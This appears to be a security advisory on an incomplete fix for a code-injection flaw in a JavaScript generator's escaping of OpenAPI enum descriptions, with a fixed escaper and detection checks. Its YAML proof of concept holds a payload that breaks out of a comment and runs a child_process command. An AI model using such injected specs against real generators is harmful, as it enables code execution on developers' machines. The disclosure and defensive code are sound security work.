CVE-2026-23947 had an incomplete fix
While the current jsStringEscape function properly handles single quotes ('), double quotes (") and other special characters, it does not escape the * and / characters. A value containing a */ sequence therefore terminates the JavaScript comment block the generator writes it into, and everything that follows lands in the generated file as code, which lets an attacker who controls the OpenAPI document inject arbitrary code into the generated output.
Example:
```yaml
openapi: 3.0.4
info:
  title: Enum PoC
  version: "1.0.0"
paths:
  /ping:
    get:
      operationId: ping
      responses:
        "200":
          description: ok
          content:
            application/json:
              schema:
                $ref: "#/components/schemas/EvilEnum"
components:
  schemas:
    EvilEnum:
      type: string
      enum:
        - PWNED
      x-enumDescriptions:
        # "pwned */ }; import('child_process').then(cp => cp.execSync('touch pwned')); const a = { /*"
        - "pwned */ };...
```
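The following is an added example, not the project's own jsStringEscape implementation: an escaper for values a code generator interpolates into JavaScript source that also neutralises `*` and `/`, plus two checks a maintainer can use to confirm the gap is closed. The function names (`escapeForJsSource`, `renderEnumMemberDoc`, `commentTerminatorCount`, `findSuspiciousDescriptions`) and the sample description string are this example's own assumptions; the `*` and `/` handling is the part the incomplete fix was missing.

```javascript
// Added example (not the advisory's or the project's code). Escapes a value so
// that it is safe both inside a JS string literal and inside a /* */ comment.
// '*' and '/' are rewritten as \u002A and \u002F: in a string literal they
// decode back to the original character, while inside a comment they stay as
// six literal characters, so the output can never contain the terminator "*/".
const ESCAPES = {
  "\\": "\\\\",
  "'": "\\'",
  '"': '\\"',
  "\n": "\\n",
  "\r": "\\r",
  "\u2028": "\\u2028", // line/paragraph separators also end a JS line
  "\u2029": "\\u2029",
  "*": "\\u002A",
  "/": "\\u002F",
};

function escapeForJsSource(value) {
  return String(value).replace(/[\\'"\n\r\u2028\u2029*\/]/g, (ch) => ESCAPES[ch]);
}

// Renders one enum member the way a generator might: a JSDoc line built from
// the untrusted description, followed by the member itself (hypothetical layout).
function renderEnumMemberDoc(name, description) {
  return `/** ${escapeForJsSource(description)} */\n${name} = '${escapeForJsSource(name)}',`;
}

// Defender-side check on generated output: a correctly escaped doc comment
// contains exactly one "*/", the one that closes it. Anything more means a
// value broke out of the comment.
function commentTerminatorCount(source) {
  return (source.match(/\*\//g) || []).length;
}

// Spec-side check: flag enum descriptions that carry a comment terminator
// before they reach the generator at all (useful as a lint on third-party specs).
function findSuspiciousDescriptions(descriptions) {
  return Object.entries(descriptions)
    .filter(([, text]) => /\*\//.test(String(text)))
    .map(([name]) => name);
}

// Constructed sample input in the shape of the advisory's PoC, with a harmless
// payload: the text tries to close the comment and start a statement.
const sampleDescription = "pwned */ }; evil(); const a = { /*";

const unsafeSnippet = `/** ${sampleDescription} */`;     // what the incomplete fix emitted
const safeSnippet = renderEnumMemberDoc("PWNED", sampleDescription);

console.log("terminators in unescaped snippet:", commentTerminatorCount(unsafeSnippet)); // 2
console.log("terminators in escaped snippet:  ", commentTerminatorCount(safeSnippet));   // 1
console.log("flagged members:", findSuspiciousDescriptions({ PWNED: sampleDescription, OK: "fine" }));
```

The regex in `escapeForJsSource` is deliberately a character class rather than a list of `replace` calls, so adding a new dangerous character is a one-line change and cannot be forgotten for one of the two quoting styles.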
CVSS v4.0 base score: 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N)

Exploitability: AV:N, AC:L, AT:N, PR:N, UI:N
Vulnerable System: VC:H, VI:H, VA:H
Subsequent System: SC:N, SI:N, SA:N